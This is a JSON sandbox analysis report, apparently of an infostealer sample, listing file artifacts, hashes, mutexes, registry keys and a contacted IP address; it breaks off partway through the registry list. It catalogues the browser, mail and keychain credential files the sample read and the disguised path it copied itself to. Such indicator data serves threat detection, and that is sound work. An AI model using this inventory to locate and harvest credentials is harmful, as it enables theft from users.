{ "analysis_details": { "creation_time": "2017-11-28 19:17 (UTC+1)", "execution_successful": true, "number_of_processes": 12, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:24" }, "artifacts": { "files": [ { "filename": "C:\\Users\\aETAdzjz\\Desktop", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz", "hashes": [], "norm_filename": "c:\\users\\aetadzjz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\3292.exe", "hashes": [ { "md5_hash": "ca6f2ee0e3b7218da76d126d22f707be", "sha1_hash": "a7fc89d6b45ce712c0be6600be4a8e6de9de434d", "sha256_hash": "b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\3292.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe", "hashes": [ { "md5_hash": "ca6f2ee0e3b7218da76d126d22f707be", "sha1_hash": "a7fc89d6b45ce712c0be6600be4a8e6de9de434d", "sha256_hash": "b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\3292.exe", "hashes": [ { "md5_hash": "ca6f2ee0e3b7218da76d126d22f707be", "sha1_hash": "a7fc89d6b45ce712c0be6600be4a8e6de9de434d", "sha256_hash": "b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\public\\3292.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe:Zone.Identifier", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe:zone.identifier", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\FB70.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "36427ecb2a0faf13af3047c51b29f9c5", "sha1_hash": "9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "sha256_hash": "ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\fb70.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\FB2F.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "0b5111a9cc6baab51851f1702403b937", "sha1_hash": "e95885d85bd47cc19e1181b046995ccd975fd59d", "sha256_hash": "62a0536a5b9d1e3cb2af52a5630c330cd30da7398bcddf4a17af0913fc502819", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\fb2f.tmp", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\FB6F.tmp", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\programdata\\fb6f.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo_lng.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo_lng.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "hashes": [ { "md5_hash": "009e3e410a28a8e518f2c6ac83306724", "sha1_hash": "121b97b6c22d60d1dedc8d0160c86e8b9afa5089", "sha256_hash": "960f4e97d46b9ddaece01a9def1d6fe466103fa57203483b13c8eb8c26a7b6bc", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017110620171113\\index.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012017110620171113\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017112820171129\\index.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012017112820171129\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017070320170710\\index.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017070320170710\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\MSHist012017071220170713\\index.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\low\\history.ie5\\mshist012017071220170713\\index.dat", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\webcache\\webcachev24.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\history.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\history.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla firefox\\nss3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\logins.json", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\logins.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Firefox\\sqlite3.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla firefox\\sqlite3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Firefox\\mozsqlite3.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla firefox\\mozsqlite3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\SeaMonkey\\profiles.ini", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\seamonkey\\profiles.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Sea Monkey\\nss3.dll", "hashes": [], "norm_filename": "c:\\program files (x86)\\sea monkey\\nss3.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\yandex\\yandexbrowser\\user data\\default\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\crashpad\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\crashpad\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\origintrials\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\origintrials\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\pepperflash\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\pepperflash\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\pnacl\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\pnacl\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\swreporter\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\swreporter\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Web Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\web data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\apple computer\\preferences\\keychain.plist", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera\\Opera\\wand.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\opera\\opera\\wand.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\opera\\opera7\\profile\\wand.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\opera software\\opera stable\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Profiles", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\profiles", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Roaming\\Thunderbird\\Profiles", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\thunderbird\\profiles", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Mozilla Thunderbird", "hashes": [], "norm_filename": "c:\\program files (x86)\\mozilla thunderbird", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows Mail\\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", "hashes": [], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows mail\\account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe", "hashes": [ { "md5_hash": "ca6f2ee0e3b7218da76d126d22f707be", "sha1_hash": "a7fc89d6b45ce712c0be6600be4a8e6de9de434d", "sha256_hash": "b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "108.163.227.35", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "delete", "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "XoBZXxTVpSVrDHIx3tCj", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\I705BA84C", "operations": [ "delete", "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\M705BA84C", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Licenses", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.7", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.7\\409", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.7\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": 